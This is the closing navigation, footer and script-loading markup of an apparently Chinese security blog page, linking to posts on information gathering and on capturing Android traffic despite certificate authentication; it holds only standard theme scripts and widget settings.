class="label">上一篇</div><div class="prev_info"><span>信息收集总结</span></div></a></div><div class="next-post pull_right"><a href="/2020/07/20/HttpCertificate/"><img class="next_cover lazyload" data-src="https://gitee.com/asc0t6e/Random-img/raw/master/BlogCover/107.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>解决安卓单向/双向认证导致无法抓包</span></div></a></div></nav></div></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2017 - 2020 By ascotbe</div><span>呐呐呐ฅ(๑*д*๑)ฅ到底啦~</span><div class="icp"><a href="http://www.beian.miit.gov.cn/state/outPortal/loginPortal.action" target="_blank" rel="noopener"><img class="icp-icon" src="/img/icp.png"><span>闽ICP备20002178号-1</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="简繁转换" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/fireworks.js"></script><script id="ribbon_piao" mobile="false" src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/piao.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><script src="https://cdn.jsdelivr.net/gh/jerryc127/butterfly_cdn@2.1.0/js/click_heart.js"></script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/Bronya.model.json"},"display":{"position":"right","width":400,"height":500,"hOffset":-110,"vOffset":-40},"mobile":{"show":false},"log":false});</script></body></html>